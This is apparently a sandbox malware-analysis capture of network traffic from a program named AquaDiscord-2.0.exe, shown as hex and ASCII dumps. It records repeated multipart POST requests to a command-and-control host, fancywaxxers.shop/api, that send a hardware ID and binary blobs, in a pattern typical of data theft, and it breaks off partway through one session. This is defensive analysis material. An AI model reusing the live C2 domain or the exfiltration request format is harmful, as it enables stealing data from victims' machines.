                                                                                        2024-12-30 19:40:02 UTC1369INData Raw: 33 64 35 61 0d 0a 54 6b 56 6b 73 62 42 2b 31 4f 4f 35 4c 6d 33 70 4f 66 62 70 4a 6b 4f 6a 4b 66 43 50 33 4e 59 67 36 63 30 68 41 78 76 37 50 47 66 36 41 49 42 46 64 48 72 55 59 76 33 72 57 57 76 62 52 56 31 30 41 4a 65 6f 68 55 35 59 6c 74 41 39 4b 46 55 54 6d 35 75 73 70 33 6f 67 63 48 48 51 44 6d 54 54 79 61 34 64 2b 58 6c 57 47 51 5a 44 49 2b 6d 78 44 36 79 6d 6b 41 6e 64 49 5a 64 66 54 32 78 57 44 6b 56 6b 73 79 48 75 5a 50 4d 64 37 79 6d 49 76 54 5a 35 6b 68 61 33 71 62 45 2f 72 50 62 77 4f 54 32 78 6b 77 73 72 4c 44 66 71 49 4e 42 42 4d 4d 37 45 34 7a 6b 75 50 63 6b 35 4a 73 6e 6d 34 34 50 39 64 55 76 4d 35 79 54 38 71 64 49 44 61 73 6f 64 4a 30 35 42 46 46 44 6b 6e 71 54 58 66 47 72 64 65 41 6d 57 71 62 5a 44 77 2f 6c 42 58 37 78 47 77 44 6d 4e 51
                                                                                        Data Ascii: 3d5aTkVksbB+1OO5Lm3pOfbpJkOjKfCP3NYg6c0hAxv7PGf6AIBFdHrUYv3rWWvbRV10AJeohU5YltA9KFUTm5usp3ogcHHQDmTTya4d+XlWGQZDI+mxD6ymkAndIZdfT2xWDkVksyHuZPMd7ymIvTZ5kha3qbE/rPbwOT2xkwsrLDfqINBBMM7E4zkuPck5Jsnm44P9dUvM5yT8qdIDasodJ05BFFDknqTXfGrdeAmWqbZDw/lBX7xGwDmNQ
                                                                                        2024-12-30 19:40:02 UTC1369INData Raw: 63 6c 7a 6f 41 34 48 46 77 33 67 51 53 57 52 36 74 47 62 6d 48 4b 66 5a 6a 51 78 6e 78 48 7a 7a 33 67 44 6e 4d 38 55 4a 36 6a 32 6a 44 69 6a 46 6b 74 50 53 64 74 47 4a 34 37 75 6c 4b 4f 46 59 34 4e 71 50 6a 62 58 42 62 4c 51 4b 67 69 65 6e 55 6c 31 76 4c 6e 4c 65 36 73 50 41 68 73 45 36 45 67 79 6e 2b 76 53 6d 4a 6c 67 6b 32 63 79 50 35 30 5a 2f 63 4e 6a 43 4a 72 61 45 69 66 36 2b 49 4a 2f 76 45 35 54 56 79 44 71 55 7a 6d 4f 72 63 6e 63 69 69 43 53 62 58 4e 69 31 78 37 32 78 6d 34 49 6e 74 73 55 4d 37 65 33 7a 58 6d 6b 41 51 38 63 41 4f 74 41 4f 70 76 67 30 6f 43 5a 61 35 70 74 4f 6a 61 61 57 72 4b 4a 62 52 66 53 68 56 45 45 74 37 6a 4d 66 37 4a 4f 46 46 6b 51 72 55 59 37 33 72 57 57 6b 35 39 76 6c 6d 34 77 4f 5a 59 51 37 74 74 6d 42 70 72 59 48 54 36 30
                                                                                        Data Ascii: clzoA4HFw3gQSWR6tGbmHKfZjQxnxHzz3gDnM8UJ6j2jDijFktPSdtGJ47ulKOFY4NqPjbXBbLQKgienUl1vLnLe6sPAhsE6Egyn+vSmJlgk2cyP50Z/cNjCJraEif6+IJ/vE5TVyDqUzmOrcnciiCSbXNi1x72xm4IntsUM7e3zXmkAQ8cAOtAOpvg0oCZa5ptOjaaWrKJbRfShVEEt7jMf7JOFFkQrUY73rWWk59vlm4wOZYQ7ttmBprYHT60
                                                                                        2024-12-30 19:40:02 UTC1369INData Raw: 49 46 43 68 51 66 34 46 46 33 30 4b 33 48 6c 59 49 67 7a 58 63 6a 4c 5a 41 46 73 74 41 71 43 4a 36 64 53 58 57 38 76 38 52 2f 6f 67 41 5a 45 67 2f 69 54 6a 36 58 36 64 36 52 6b 32 53 52 5a 6a 59 35 6d 78 48 37 79 6d 55 4c 6d 39 4d 59 4f 76 72 34 67 6e 2b 38 54 6c 4e 58 4b 50 5a 43 4f 35 4f 74 79 64 79 4b 49 4a 4a 74 63 32 4c 58 46 76 4c 4d 61 67 57 55 32 52 51 7a 73 4c 50 43 63 36 63 42 44 78 45 4e 34 6b 45 38 6c 2b 7a 51 6c 35 6c 72 6b 32 77 77 50 4a 46 61 73 6f 6c 74 46 39 4b 46 55 52 57 68 75 38 35 2f 35 42 46 46 44 6b 6e 71 54 58 66 47 72 64 32 65 6c 32 65 56 62 44 41 79 6b 68 37 32 7a 47 6f 48 67 4e 55 52 4d 71 69 6b 77 6e 47 68 41 67 67 58 44 65 74 49 4d 5a 33 70 6c 74 7a 54 5a 34 30 68 61 33 71 36 46 76 76 67 62 52 54 53 77 6c 38 73 2b 72 48 4f 4f
                                                                                        Data Ascii: IFChQf4FF30K3HlYIgzXcjLZAFstAqCJ6dSXW8v8R/ogAZEg/iTj6X6d6Rk2SRZjY5mxH7ymULm9MYOvr4gn+8TlNXKPZCO5OtydyKIJJtc2LXFvLMagWU2RQzsLPCc6cBDxEN4kE8l+zQl5lrk2wwPJFasoltF9KFURWhu85/5BFFDknqTXfGrd2el2eVbDAykh72zGoHgNURMqikwnGhAggXDetIMZ3pltzTZ40ha3q6FvvgbRTSwl8s+rHOO
                                                                                        2024-12-30 19:40:02 UTC1369INData Raw: 46 57 2f 49 42 4b 4b 47 6a 6c 70 50 54 4f 4b 78 34 63 79 7a 58 51 71 36 48 4b 68 33 53 68 56 46 79 75 61 54 51 66 71 63 59 43 46 41 33 30 32 59 68 6c 4f 72 47 6c 59 52 76 31 53 39 7a 4e 64 64 43 78 59 6c 6a 43 49 6e 4d 42 7a 69 71 73 59 4a 48 36 6b 34 54 56 31 47 74 64 44 53 51 34 39 47 45 67 69 32 79 64 7a 6b 39 68 78 33 72 78 69 70 42 30 74 74 52 62 65 6e 34 67 6e 79 31 54 6c 4e 48 57 37 59 55 5a 4d 6d 39 68 49 33 64 65 64 56 33 63 32 4c 46 56 4c 7a 62 4b 6c 66 53 6d 68 49 6e 71 4c 44 42 62 71 64 4a 4e 53 6b 75 39 30 77 78 69 66 7a 6f 72 4a 52 36 6d 47 63 6b 4b 39 73 50 2f 38 64 6b 43 49 53 64 58 33 57 31 39 70 70 42 35 45 5a 4c 4b 45 65 74 57 58 66 47 72 65 4f 52 6e 57 36 53 64 79 4a 33 73 41 44 78 7a 33 30 65 30 70 4e 52 4d 2f 72 75 6b 44 62 6b 43 68
                                                                                        Data Ascii: FW/IBKKGjlpPTOKx4cyzXQq6HKh3ShVFyuaTQfqcYCFA302YhlOrGlYRv1S9zNddCxYljCInMBziqsYJH6k4TV1GtdDSQ49GEgi2ydzk9hx3rxipB0ttRben4gny1TlNHW7YUZMm9hI3dedV3c2LFVLzbKlfSmhInqLDBbqdJNSku90wxifzorJR6mGckK9sP/8dkCISdX3W19ppB5EZLKEetWXfGreORnW6SdyJ3sADxz30e0pNRM/rukDbkCh
                                                                                        2024-12-30 19:40:02 UTC1369INData Raw: 52 6a 47 34 7a 5a 62 63 30 32 2f 56 4f 51 70 36 33 31 72 44 68 79 6f 58 30 6f 56 52 41 4c 6d 34 7a 48 2b 79 48 30 59 2f 4b 74 64 37 64 62 4c 71 77 39 43 6e 5a 34 56 77 4f 44 65 62 57 72 4b 4a 62 45 2f 4b 6a 56 39 31 76 71 65 43 49 50 52 63 55 45 4a 61 75 68 46 6c 67 61 50 50 30 6f 55 67 7a 54 4e 39 65 6f 56 61 70 49 6b 74 44 49 44 50 46 7a 61 73 74 59 56 47 6d 69 6b 46 45 41 6a 37 55 53 43 52 30 2b 69 48 6b 47 36 62 5a 69 55 72 31 31 53 38 78 69 70 58 71 35 31 5a 64 59 58 34 67 6d 44 6b 56 6b 73 69 43 75 4e 50 4d 49 6a 38 6d 37 57 64 5a 35 52 33 49 79 32 59 57 72 4b 4a 62 45 2f 4b 6a 31 39 31 76 71 65 43 49 50 52 63 55 45 4a 61 75 68 46 6c 67 61 50 50 30 6f 55 67 7a 54 4e 39 65 6f 56 61 70 49 6b 74 44 49 44 50 46 7a 61 73 74 59 56 47 6d 69 6b 46 45 41 6a
                                                                                        Data Ascii: RjG4zZbc02/VOQp631rDhyoX0oVRALm4zH+yH0Y/Ktd7dbLqw9CnZ4VwODebWrKJbE/KjV91vqeCIPRcUEJauhFlgaPP0oUgzTN9eoVapIktDIDPFzastYVGmikFEAj7USCR0+iHkG6bZiUr11S8xipXq51ZdYX4gmDkVksiCuNPMIj8m7WdZ5R3Iy2YWrKJbE/Kj191vqeCIPRcUEJauhFlgaPP0oUgzTN9eoVapIktDIDPFzastYVGmikFEAj


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.449732104.21.16.14437400C:\Users\user\Desktop\AquaDiscord-2.0.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-30 19:40:03 UTC281OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=PWVB9DTBKL8T9JJG
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 18155
                                                                                        Host: fancywaxxers.shop
                                                                                        2024-12-30 19:40:03 UTC15331OUTData Raw: 2d 2d 50 57 56 42 39 44 54 42 4b 4c 38 54 39 4a 4a 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 43 33 30 33 38 30 39 32 36 39 43 41 43 42 43 38 32 41 38 31 34 38 43 36 45 35 34 34 30 30 0d 0a 2d 2d 50 57 56 42 39 44 54 42 4b 4c 38 54 39 4a 4a 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 57 56 42 39 44 54 42 4b 4c 38 54 39 4a 4a 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 0d 0a
                                                                                        Data Ascii: --PWVB9DTBKL8T9JJGContent-Disposition: form-data; name="hwid"A0C303809269CACBC82A8148C6E54400--PWVB9DTBKL8T9JJGContent-Disposition: form-data; name="pid"2--PWVB9DTBKL8T9JJGContent-Disposition: form-data; name="lid"yau6Na--899083440
                                                                                        2024-12-30 19:40:03 UTC2824OUTData Raw: eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9
                                                                                        Data Ascii: JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6
                                                                                        2024-12-30 19:40:04 UTC1140INHTTP/1.1 200 OK
                                                                                        Date: Mon, 30 Dec 2024 19:40:03 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=7ml4d00qkj2v8p8k7spjbcia9k; expires=Fri, 25 Apr 2025 13:26:42 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=htTH3v%2BRuutXPibbpcUqFkKZ2ivTOgvzSCgJxWA%2B9PqJ7Lz2GT3wht2SKfw7dtyi9YfxlyWr2ioxMcB%2FictfajGZD%2FTLw2Q5tchHI6k3U%2BH4TMS%2BuSJded6JU2KkZpwW7j54Gw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fa47fd9ba8b0fa8-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=9609&min_rtt=1529&rtt_var=5502&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2843&recv_bytes=19116&delivery_rate=1909744&cwnd=252&unsent_bytes=0&cid=6b84b3717fd8fdbb&ts=590&x=0"
                                                                                        2024-12-30 19:40:04 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                        Data Ascii: fok 8.46.123.189
                                                                                        2024-12-30 19:40:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.449733104.21.16.14437400C:\Users\user\Desktop\AquaDiscord-2.0.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-30 19:40:04 UTC280OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=31SE6XOSNI1GR4O9
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 8776
                                                                                        Host: fancywaxxers.shop
                                                                                        2024-12-30 19:40:04 UTC8776OUTData Raw: 2d 2d 33 31 53 45 36 58 4f 53 4e 49 31 47 52 34 4f 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 43 33 30 33 38 30 39 32 36 39 43 41 43 42 43 38 32 41 38 31 34 38 43 36 45 35 34 34 30 30 0d 0a 2d 2d 33 31 53 45 36 58 4f 53 4e 49 31 47 52 34 4f 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 31 53 45 36 58 4f 53 4e 49 31 47 52 34 4f 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 0d 0a
                                                                                        Data Ascii: --31SE6XOSNI1GR4O9Content-Disposition: form-data; name="hwid"A0C303809269CACBC82A8148C6E54400--31SE6XOSNI1GR4O9Content-Disposition: form-data; name="pid"2--31SE6XOSNI1GR4O9Content-Disposition: form-data; name="lid"yau6Na--899083440
                                                                                        2024-12-30 19:40:05 UTC1129INHTTP/1.1 200 OK
                                                                                        Date: Mon, 30 Dec 2024 19:40:05 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=rp437efj0arpaj11hqb37phisa; expires=Fri, 25 Apr 2025 13:26:44 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X0Zipre7Bx%2BmmjAWDWWHRmWict7q8B74s2tJysiVglhW7o5NjblBEYyidRb0gZq7dDftnDDodOHIJKqcWssm3TUIWOtwizBvjaq%2B48udOXsJ3n83HcFN7PFCVwkWAdjLTuyQhg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fa47fe19d2141ba-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1670&min_rtt=1670&rtt_var=835&sent=10&recv=19&lost=0&retrans=1&sent_bytes=4224&recv_bytes=9714&delivery_rate=129346&cwnd=192&unsent_bytes=0&cid=bdb77f9c74ece635&ts=626&x=0"
                                                                                        2024-12-30 19:40:05 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                        Data Ascii: fok 8.46.123.189
                                                                                        2024-12-30 19:40:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.449734104.21.16.14437400C:\Users\user\Desktop\AquaDiscord-2.0.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-30 19:40:05 UTC282OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=I24VIESSJNHBXRFHT
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 20435
                                                                                        Host: fancywaxxers.shop
                                                                                        2024-12-30 19:40:05 UTC15331OUTData Raw: 2d 2d 49 32 34 56 49 45 53 53 4a 4e 48 42 58 52 46 48 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 43 33 30 33 38 30 39 32 36 39 43 41 43 42 43 38 32 41 38 31 34 38 43 36 45 35 34 34 30 30 0d 0a 2d 2d 49 32 34 56 49 45 53 53 4a 4e 48 42 58 52 46 48 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 49 32 34 56 49 45 53 53 4a 4e 48 42 58 52 46 48 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34
                                                                                        Data Ascii: --I24VIESSJNHBXRFHTContent-Disposition: form-data; name="hwid"A0C303809269CACBC82A8148C6E54400--I24VIESSJNHBXRFHTContent-Disposition: form-data; name="pid"3--I24VIESSJNHBXRFHTContent-Disposition: form-data; name="lid"yau6Na--89908344
                                                                                        2024-12-30 19:40:05 UTC5104OUTData Raw: 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00
                                                                                        Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                                        2024-12-30 19:40:06 UTC1131INHTTP/1.1 200 OK
                                                                                        Date: Mon, 30 Dec 2024 19:40:06 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=dg57kri49sqd366lmeeas6ft2r; expires=Fri, 25 Apr 2025 13:26:45 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d%2F3vcQUCnQ7BPzVRyEvpY3pPgMUyH5jZUgsT2E2sQAAFFmPsRhwzaeZByB1yhXi7xRrOd9tkcAInD3X2toQwMepAvC4loGJ6qZL5I%2FmWA0Ee5CcJy4GN4onSc0qPX0Dfr9WvIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fa47fe929a28ce0-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1822&min_rtt=1818&rtt_var=690&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2843&recv_bytes=21397&delivery_rate=1577525&cwnd=211&unsent_bytes=0&cid=1394ecc2eb954698&ts=636&x=0"
                                                                                        2024-12-30 19:40:06 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                        Data Ascii: fok 8.46.123.189
                                                                                        2024-12-30 19:40:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.449735104.21.16.14437400C:\Users\user\Desktop\AquaDiscord-2.0.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-30 19:40:07 UTC281OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=7QDHNTT6P9GXOFE73
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 1272
                                                                                        Host: fancywaxxers.shop
                                                                                        2024-12-30 19:40:07 UTC1272OUTData Raw: 2d 2d 37 51 44 48 4e 54 54 36 50 39 47 58 4f 46 45 37 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 43 33 30 33 38 30 39 32 36 39 43 41 43 42 43 38 32 41 38 31 34 38 43 36 45 35 34 34 30 30 0d 0a 2d 2d 37 51 44 48 4e 54 54 36 50 39 47 58 4f 46 45 37 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 51 44 48 4e 54 54 36 50 39 47 58 4f 46 45 37 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34
                                                                                        Data Ascii: --7QDHNTT6P9GXOFE73Content-Disposition: form-data; name="hwid"A0C303809269CACBC82A8148C6E54400--7QDHNTT6P9GXOFE73Content-Disposition: form-data; name="pid"1--7QDHNTT6P9GXOFE73Content-Disposition: form-data; name="lid"yau6Na--89908344
                                                                                        2024-12-30 19:40:07 UTC1128INHTTP/1.1 200 OK
                                                                                        Date: Mon, 30 Dec 2024 19:40:07 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=mjlj39rqnbnlu7nulmbfle9nqd; expires=Fri, 25 Apr 2025 13:26:46 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Sc0t5xiBhvEgmP2LjLLhi6UAcykKyEG8Pol4OYUCh442Sz%2FsEn%2FexbBYPupEDWCHmKLdtsXJeqoHyagpCLMhdgIfby9OVnmehmKr0po21q7qj85yfCsgNAa3hpJsOme2iVC5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fa47ff28e758ce0-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1888&min_rtt=1859&rtt_var=718&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=2189&delivery_rate=1570736&cwnd=211&unsent_bytes=0&cid=edfaa398cb73172d&ts=417&x=0"
                                                                                        2024-12-30 19:40:07 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                        Data Ascii: fok 8.46.123.189
                                                                                        2024-12-30 19:40:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.449736104.21.16.14437400C:\Users\user\Desktop\AquaDiscord-2.0.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-30 19:40:08 UTC284OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=QHWUI9X4NXFQ1AP7DF
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 568932
                                                                                        Host: fancywaxxers.shop
